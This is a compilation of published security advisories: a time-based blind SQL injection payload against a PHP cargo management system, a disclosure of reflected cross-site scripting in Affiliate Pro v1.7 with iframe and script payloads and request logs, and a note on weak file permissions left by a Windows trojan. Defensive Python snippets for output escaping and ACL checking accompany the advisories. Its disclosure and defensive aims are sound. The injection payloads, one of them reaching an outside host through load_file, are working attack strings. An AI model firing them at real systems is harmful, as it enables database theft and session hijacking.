Payloads:<br /><br />```mysql<br />---<br />Parameter: ref_code (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=trace&ref_code=258044'+(select<br />load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''<br />AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ekn92z)<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2281<br /><br /><br />Release Date:<br />=============<br />2022-01-05<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2281<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.1<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates<br />sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track<br />it intelligently to keep your affiliates happy and also your bottom line! So how does it work? 
It is pretty simple: when a user visits<br />your website through an affiliate URL, the affiliate responsible for sending you the traffic receives a commission based on your settings.<br /><br />(Copy of the Homepage: https://jdwebdesigner.com/ & https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The Vulnerability Laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7.<br /><br /><br />Affected Product(s):<br />====================<br />jdwebdesigner<br />Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-08-22: Researcher Notification & Coordination (Security Researcher)<br />2021-08-23: Vendor Notification (Security Department)<br />2021-08-30: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2022-01-05: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple reflected cross site scripting web vulnerabilities have been discovered in the Affiliate Pro - Affiliate Management System v1.7.<br />The vulnerabilities allow remote attackers to inject their own malicious script code via a non-persistent attack vector and so compromise<br />client-side browser-to-web-application requests.<br /><br />The non-persistent cross site scripting vulnerabilities are located in the `email`, `username` and `fullname` parameters of the `index` module.<br />Attackers are able to inject malicious script code through the `Fullname`, `Username` or `Email` input fields to manipulate client-side requests.<br />The request method is POST and the attack vector is non-persistent (reflected) on the client side: the submitted values are echoed back unescaped<br />into the value attributes of the form's input fields. The injection and execution points are located in the index form through which affiliates sign up.<br /><br />Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to<br />malicious sources and non-persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] index<br /><br />Vulnerable Input(s):<br />[+] Email<br />[+] Username<br />[+] Fullname<br /><br />Vulnerable Parameter(s):<br />[+] email<br />[+] username<br />[+] fullname<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side cross site scripting vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.<br />For security demonstration or to reproduce the vulnerability, follow the information and steps below.<br /><br /><br />Exploitation: Payload<br /><iframe src="javascript:alert(1337)"></iframe><br />%3cscript%3ealert(1337)%3c%2fscript%3e<br /><br /><br />--- PoC Session Logs (POST) ---<br />POST /affiliate-pro-demo/index HTTP/1.1<br />Host: affiliates-pro.localhost:8000<br />Origin: http://affiliates-pro.localhost:8000<br />Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24<br />Referer: http://affiliates-pro.localhost:8000/affiliate-pro-demo/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />-<br />fullname=<iframe src="javascript:alert(1337)"></iframe><br />&username=<iframe src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv<br />&p=test&confirmpwd=j2B%21p5o%21K8<br />-<br />HTTP/1.1 200 OK<br />Server: Apache<br />Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly<br />Connection: Upgrade, close<br />Vary: Accept-Encoding<br />Content-Length: 6549<br />Content-Type: text/html; charset=UTF-8<br /><br /><br />Vulnerable Source: Index<br /><div class="control-group"><br /><label class="control-label" for="fullname">Full Name</label><br /><div class="controls"><br /><input id="textinput" name="fullname" type="text" placeholder="Full Name" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required="required"><br /></div><br /></div><br /><div class="control-group"><br /><label class="control-label" for="username">Username</label><br /><div class="controls"><br /><input id="textinput" name="username" type="text" placeholder="username" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required><br /></div><br /></div><br /><div class="control-group"><br /><label class="control-label" for="email">E-Mail Address</label><br /><div class="controls"><br /><input id="textinput" name="email" type="email" placeholder="test@provider.com" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required><br /></div><br /><br /><br />Security Risk:<br />==============<br />The security risk of the client-side cross site scripting vulnerabilities in the web-application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] 
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. 
All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the Vulnerability-Lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material, contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
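The advisory above shows the submitted values echoed straight into the `value="..."` attribute of each input. The following Python is an added example, not code from the affected application or from Vulnerability-Lab: `render_vulnerable()` and `render_fixed()` are hypothetical stand-ins for the server-side template (the field names and attribute markup follow the "Vulnerable Source: Index" snippet), and the two payloads are taken from the PoC. It shows the one detail a tester needs when the reflection point is a quoted attribute: the `%22%3e` (`">`) prefix in the second PoC payload closes the attribute before the `<script>` tag, which is why that payload produces a new tag while proper attribute encoding (`html.escape(..., quote=True)`) leaves no tag at all.

```python
"""Reflected XSS in a registration form: unescaped vs. escaped attribute output.

Added example; this is not code from the affected application. The field
names and the value="..." markup mirror the "Vulnerable Source: Index"
snippet in the advisory, but render_vulnerable() and render_fixed() are
hypothetical stand-ins for the server-side template.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Payloads from the advisory's PoC. The second one is URL-decoded here, as the
# server sees it after parsing the POST body: l00fp"><script>alert(1337)</script>wkgzv
IFRAME_PAYLOAD = '<iframe src="javascript:alert(1337)"></iframe>'
BREAKOUT_PAYLOAD = unquote("l00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv")

FIELDS = (
    ("fullname", "Full Name"),
    ("username", "Username"),
    ("email", "E-Mail Address"),
)
TEMPLATE_TAGS = {"div", "label", "input"}  # every other start tag came from user input


def _render(form: dict, encode) -> str:
    parts = []
    for name, label in FIELDS:
        value = encode(form.get(name, ""))
        parts.append(
            '<div class="control-group">'
            f'<label class="control-label" for="{name}">{label}</label>'
            f'<input name="{name}" type="text" value="{value}" required>'
            "</div>"
        )
    return "\n".join(parts)


def render_vulnerable(form: dict) -> str:
    """Reflect submitted values verbatim into value="..." (the behaviour in the advisory)."""
    return _render(form, lambda v: v)


def render_fixed(form: dict) -> str:
    """Same markup, but each value is HTML-attribute encoded before output.

    html.escape(quote=True) rewrites & < > " ' as entities, so a value can
    neither close the surrounding quotes nor open a new tag.
    """
    return _render(form, lambda v: escape(v, quote=True))


def reflects_unencoded(html_body: str, payload: str) -> bool:
    """True if the payload is echoed byte-for-byte, i.e. without output encoding."""
    return payload in html_body


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(html_body: str) -> set:
    """Start tags in the response that the template itself never emits.

    A non-empty result means the input broke out of its attribute context and
    a browser will treat attacker-controlled text as markup.
    """
    parser = _TagCollector()
    parser.feed(html_body)
    parser.close()
    return set(parser.tags) - TEMPLATE_TAGS


if __name__ == "__main__":
    form = {"username": BREAKOUT_PAYLOAD}
    print("vulnerable:", sorted(injected_tags(render_vulnerable(form))))  # ['script']
    print("fixed:", sorted(injected_tags(render_fixed(form))))            # []
```

`reflects_unencoded()` is the quick check to run against a live response: if the raw payload string comes back unchanged, the application is not encoding output for that field. `injected_tags()` goes one step further and reports whether the reflection actually yields new markup, which separates a payload that merely sits inside a quoted attribute from one that closes the attribute first.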
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/b4638a10f7cfdbf39b9fef7539c63852.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Cosmu.abix<br />Vulnerability: Insecure Permissions<br />Description: The malware writes several PE files and a directory with insecure permissions under the root of the C: drive, granting Change (C) permissions to the Authenticated Users group. Every ACE in the cacls output below carries the (ID) flag, so these permissions are inherited from the parent directory rather than set explicitly by the malware. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: b4638a10f7cfdbf39b9fef7539c63852<br />Vuln ID: MVID-2022-0494<br />Disclosure: 02/21/2022<br /><br />Exploit/PoC:<br />C:\dump>attrib -s -h \RECYCLEP<br /><br />C:\dump>dir \RECYCLEP<br /> Volume in drive C has no label.<br /><br /> Directory of C:\RECYCLEP<br /><br /> 0 File(s) 0 bytes<br /> 2 Dir(s) 26,756,165,632 bytes free<br /><br />C:\dump>dir /a \RECYCLEP<br /> Volume in drive C has no label.<br /><br /> Directory of C:\RECYCLEP<br /><br />07/06/2012 12:40 PM 2,782,863 Pagefile.exe<br /> 1 File(s) 2,782,863 bytes<br /> 2 Dir(s) 26,756,165,632 bytes free<br /><br /><br />C:\>cacls RECYCLEP<br />C:\RECYCLEP BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>cacls "ntldr~6"<br />C:\ntldr~6 BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>cacls "ntldr~8"<br />C:\ntldr~8 BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is 
supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
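The PoC above is read by eye: three `cacls` listings, each with an Authenticated Users ACE granting C (Change). The following Python is an added example, not part of the Malvuln advisory, that parses `cacls` output of exactly that shape and reports ACEs letting a low-privilege principal modify the object itself. The sample input is the advisory's own `cacls` output embedded as a constructed string so the script runs offline; the set of low-privilege principals and the meaning of the permission letters (F full, C change, W write, R read) and flags (ID inherited, IO inherit-only) are taken from `cacls` syntax, not from the advisory. Inherit-only ACEs are skipped because they apply to children, not to the object they are listed on.

```python
"""Flag weak DACL entries in cacls output of the kind shown in the PoC.

Added example, not part of the Malvuln advisory. CACLS_OUTPUT is the
advisory's own cacls output, embedded as a constructed sample. The
principal list and permission letters are assumptions based on cacls
syntax (F full, C change, W write, R read; ID inherited, IO inherit-only).
"""
import re
from dataclasses import dataclass

CACLS_OUTPUT = r"""
C:\RECYCLEP BUILTIN\Administrators:(OI)(CI)(ID)F
 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
 BUILTIN\Users:(OI)(CI)(ID)R
 NT AUTHORITY\Authenticated Users:(ID)C
 NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\ntldr~6 BUILTIN\Administrators:(ID)F
 NT AUTHORITY\SYSTEM:(ID)F
 BUILTIN\Users:(ID)R
 NT AUTHORITY\Authenticated Users:(ID)C

C:\ntldr~8 BUILTIN\Administrators:(ID)F
 NT AUTHORITY\SYSTEM:(ID)F
 BUILTIN\Users:(ID)R
 NT AUTHORITY\Authenticated Users:(ID)C
"""

# Principals every local account belongs to; write access for them is a finding.
LOW_PRIV = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
WRITE_PERMS = {"F", "C", "W"}

# One ACE as printed by cacls: <account>:(<flag>)(<flag>)...<perm>
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[A-Z]+)$")


@dataclass(frozen=True)
class Ace:
    path: str
    principal: str
    flags: tuple   # e.g. ("OI", "CI", "ID")
    perm: str      # F, C, W, R or N

    @property
    def inherited(self) -> bool:
        return "ID" in self.flags

    @property
    def inherit_only(self) -> bool:
        # (IO) ACEs propagate to children but do not apply to this object
        return "IO" in self.flags


def parse_cacls(text: str) -> list:
    """Parse cacls output into Ace records.

    The first line of each block is '<path> <ace>'; continuation lines are
    indented and carry one ACE each; a blank line ends the block. Paths are
    assumed to contain no spaces (true for every path in the advisory).
    """
    aces, path = [], None
    for raw in text.splitlines():
        if not raw.strip():
            path = None
            continue
        if raw[0].isspace() and path is not None:
            ace_text = raw.strip()
        else:
            path, _, ace_text = raw.strip().partition(" ")
        m = ACE_RE.match(ace_text)
        if m is None:  # e.g. "(special access:)" detail lines; not needed here
            continue
        flags = tuple(re.findall(r"\(([A-Z]+)\)", m["flags"]))
        aces.append(Ace(path, m["who"], flags, m["perm"]))
    return aces


def weak_aces(aces) -> list:
    """ACEs granting a low-privilege principal F, C or W on the object itself."""
    return [
        a for a in aces
        if a.principal.lower() in LOW_PRIV
        and a.perm in WRITE_PERMS
        and not a.inherit_only
    ]


if __name__ == "__main__":
    for a in weak_aces(parse_cacls(CACLS_OUTPUT)):
        origin = "inherited" if a.inherited else "explicit"
        print(f"{a.path}: {a.principal} has {a.perm} ({origin})")
```

On a live host, feed the output of `cacls <path>` for each dropped file or directory into `parse_cacls()`. The `inherited` property is what tells you whether the weakness is the malware's own ACL or, as in this sample, the default DACL of the parent directory being inherited by whatever the malware drops there.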